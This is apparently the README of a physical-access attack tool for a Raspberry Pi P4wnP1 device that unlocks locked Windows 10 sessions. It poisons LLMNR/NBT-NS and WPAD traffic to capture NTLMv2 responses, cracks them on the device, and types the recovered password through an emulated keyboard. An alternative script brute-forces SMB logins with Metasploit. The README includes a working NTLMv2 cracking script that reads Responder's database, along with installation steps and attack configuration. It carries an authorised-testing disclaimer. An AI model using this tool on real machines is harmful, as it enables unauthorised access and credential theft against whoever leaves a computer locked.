A P4wnP1 A.L.O.A. payload that unlocks a locked Windows 10 session without prior knowledge of the user's password. It does this by poisoning LLMNR/NBT-NS traffic over a spoofed USB network adapter, capturing the NTLMv2 challenge/response that the locked host sends, cracking it with John the Ripper on the device itself, then replaying the recovered password through a HID keyboard, all automatically, in one plug-in sequence. It succeeds only if the password is in the supplied wordlist.
A second script (smbrute.sh) provides an alternative path using SMB brute force via Metasploit rather than hash capture.
For educational and authorised penetration testing purposes only.
Win10_LockPicker.sh (hash capture path):

- The P4wnP1 presents itself as a USB RNDIS network adapter and a HID keyboard simultaneously.
- Windows brings the adapter up and takes a DHCP lease from the device. With static route spoofing (ROUTE_SPOOF) and a WPAD entry advertised via DHCP (WPAD_ENTRY), a portion of the target's network traffic is steered through the device. A locked session still runs the user's processes, so name lookups and connection attempts continue while the screen is locked.
- Responder answers LLMNR/NBT-NS queries and WPAD requests on that link; when the host authenticates to the spoofed service, it sends an NTLMv2 challenge/response, which Responder records.
- The capture is stored in the Responder SQLite database. Once a hash is detected, Responder is stopped and John the Ripper runs against the hash file. An NTLMv2 response cannot be passed or replayed, so a typeable password has to be recovered by cracking, and on the Zero W's CPU that is only practical against a modest wordlist.
- On a successful crack, the recovered plaintext password is typed into the locked session via the HID keyboard emulator. The script sends CTRL+ALT+DEL first to bring the credential prompt forward, then types the password and presses Enter.
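The capture-and-crack step in concrete terms, as an added example that is not code from Win10_LockPicker.sh, Responder or John: a pure-Python NTLMv2 check of the kind John's netntlmv2 format performs, fed from a poll of Responder.db. Assumptions: the Responder table and column names follow Responder's CreateResponderDb() and should be checked against the installed copy; the user alice, domain CORP, password Summer2024!, the server challenge, the blob and the database row are all constructed here so the script runs with no target attached. Python rather than bash because the HMAC-MD5 arithmetic is the point.

```python
"""Offline NTLMv2 check, the work John's --format=netntlmv2 does on the Pi.

Added example, not code from Win10_LockPicker.sh. Standard library only; the
capture line is constructed from a chosen password so the run is offline.
MD4 is hand-rolled because OpenSSL 3 builds of Python often refuse md4.
"""
import hashlib
import hmac
import sqlite3
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. The Windows NT hash is MD4 over the UTF-16LE password."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h3 = lambda x, y, z: x ^ y ^ z
    rounds = (  # (function, additive constant, word order, shift pattern)
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h3, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = h
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a = _rotl(a + fn(b, c, d) + x[j] + k, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: next step updates old d
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(user: str, domain: str, password: str) -> bytes:
    """NTOWFv2 (MS-NLMP): HMAC-MD5 keyed with the NT hash over UPPER(user)+domain."""
    msg = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), msg, hashlib.md5).digest()


def nt_proof(v2_hash: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: the 16 bytes Responder records after the server challenge."""
    return hmac.new(v2_hash, server_challenge + blob, hashlib.md5).digest()


# Constructed NTLMv2 blob ("temp"): header, zero timestamp, client challenge,
# one AV pair naming the domain, terminator. The cracker only HMACs over it.
SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + b"\xaa" * 8 + b"\x00" * 4
               + struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le")
               + struct.pack("<HH", 0, 0) + b"\x00" * 4)


def build_capture_line(user, domain, password, server_challenge, blob):
    """user::domain:challenge:NTProofStr:blob, the layout Responder writes and
    John's --format=netntlmv2 reads. Constructed from a known password."""
    proof = nt_proof(ntlmv2_hash(user, domain, password), server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, candidates):
    """Return the first candidate whose NTProofStr matches the capture, else None."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for pw in candidates:
        if hmac.compare_digest(nt_proof(ntlmv2_hash(user, domain, pw), chal, blob), proof):
            return pw
    return None


def new_ntlmv2_captures(con, seen):
    """Rows in Responder.db not yet handed to the cracker. Table and column names
    follow Responder's CreateResponderDb(); assumed, check your installed copy."""
    rows = con.execute("SELECT fullhash FROM Responder WHERE type LIKE 'NTLMv2%'").fetchall()
    fresh = [r[0] for r in rows if r[0] not in seen]
    seen.update(fresh)
    return fresh


def demo():
    """Constructed end-to-end run: one capture row in an in-memory Responder.db,
    polled and cracked. The password is known here only so the run is checkable."""
    line = build_capture_line("alice", "CORP", "Summer2024!",
                              bytes.fromhex("0123456789abcdef"), SAMPLE_BLOB)
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Responder (timestamp TEXT, module TEXT, type TEXT, client TEXT,"
                " hostname TEXT, user TEXT, cleartext TEXT, hash TEXT, fullhash TEXT)")
    con.execute("INSERT INTO Responder VALUES (?,?,?,?,?,?,?,?,?)",
                ("2024-06-01 10:00:00", "SMB", "NTLMv2-SSP", "172.16.0.2", "",
                 "CORP\\alice", "", line.split(":")[4], line))
    return [crack(h, ["password", "Winter2023", "Summer2024!"])
            for h in new_ntlmv2_captures(con, set())]


if __name__ == "__main__":
    print(demo())
```

On the Zero W this loop is not a substitute for John, which does the same HMAC-MD5 work in optimised C; the value is in seeing what the capture line contains, why only the recovered plaintext (never the response itself) is usable at the HID step, and how a poll of Responder.db can hand new captures to the cracker without re-running old ones.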
smbrute.sh (SMB brute force path):

- Same USB gadget setup: RNDIS + HID keyboard.
- Once the target receives a DHCP lease, the script resolves its IP and checks whether port 445 is open using Nmap. The Windows firewall blocks inbound SMB on networks it classifies as Public, which is the default for an unidentified network such as this adapter, so this path depends on the target's firewall profile.
- If SMB is reachable, Metasploit's smb_login auxiliary module (auxiliary/scanner/smb/smb_login) runs a credential brute force using the provided wordlists. Every failed attempt is logged on the target (Event ID 4625) and counts toward any account lockout threshold, so keep the password list short.
- On a successful login, the found password is replayed via HID in the same way as the hash capture path.
- P4wnP1 A.L.O.A. (Raspberry Pi Zero W)
- Responder (included in P4wnP1)
- John the Ripper (for the hash capture path)
- Nmap and Metasploit (for the SMB brute force path)
- Wordlists placed at /usr/local/P4wnP1/scripts/wordlists/ (users.txt and passwords.txt)
Copy the scripts to the P4wnP1 scripts directory:

```sh
cp Win10_LockPicker.sh /usr/local/P4wnP1/scripts/
cp smbrute.sh /usr/local/P4wnP1/scripts/
chmod +x /usr/local/P4wnP1/scripts/Win10_LockPicker.sh
chmod +x /usr/local/P4wnP1/scripts/smbrute.sh
```

In the P4wnP1 web interface, configure the USB gadget settings to expose RNDIS and HID keyboard, then create a trigger that launches the chosen script when a DHCP lease is issued.
The keyboard layout is set to French (fr) in both scripts. Change the lang variable and the layout() call in the generated HID script if your target uses a different layout; a password typed through the wrong layout will not match, so confirm the target's layout before the credential prompt is driven.
Both scripts expose a set of variables at the top that control behaviour.
| Variable | Default | Description |
|---|---|---|
| USE_RNDIS | true | Enable RNDIS network adapter emulation |
| USE_HID | true | Enable HID keyboard emulation |
| lang | fr | Keyboard layout for the target |
| IF_IP | 172.16.0.1 | IP address of the P4wnP1 interface |
| IF_MASK | 255.255.255.252 | Subnet mask |
| IF_DHCP_RANGE | 172.16.0.2,... | DHCP range offered to the target |
| ROUTE_SPOOF | true | Inject static routes to maximise hash capture |
| WPAD_ENTRY | true | Advertise a WPAD proxy via DHCP |
| CRACK | true | Run John the Ripper after hash capture |
| LOGIN | true | Type the recovered password via HID |

| Variable | Default | Description |
|---|---|---|
| WORDLIST_DIR | /usr/local/P4wnP1/scripts/wordlists | Directory containing wordlists |
| LOOTBASE | /usr/local/P4wnP1/www/loot/smbrute/ | Directory where results are saved |
```
Win10_LockPicker-by-Infinition/
    Win10_LockPicker.sh   # Hash capture + crack + HID replay
    smbrute.sh            # SMB brute force + HID replay
    README.md
```

Wordlists, loot directories, and the temporary HID scripts generated at runtime are excluded from version control via .gitignore.
This tool is intended for use on systems you own or have explicit written authorisation to test. Plugging this into a machine without permission is illegal in most jurisdictions. The author takes no responsibility for misuse.
MIT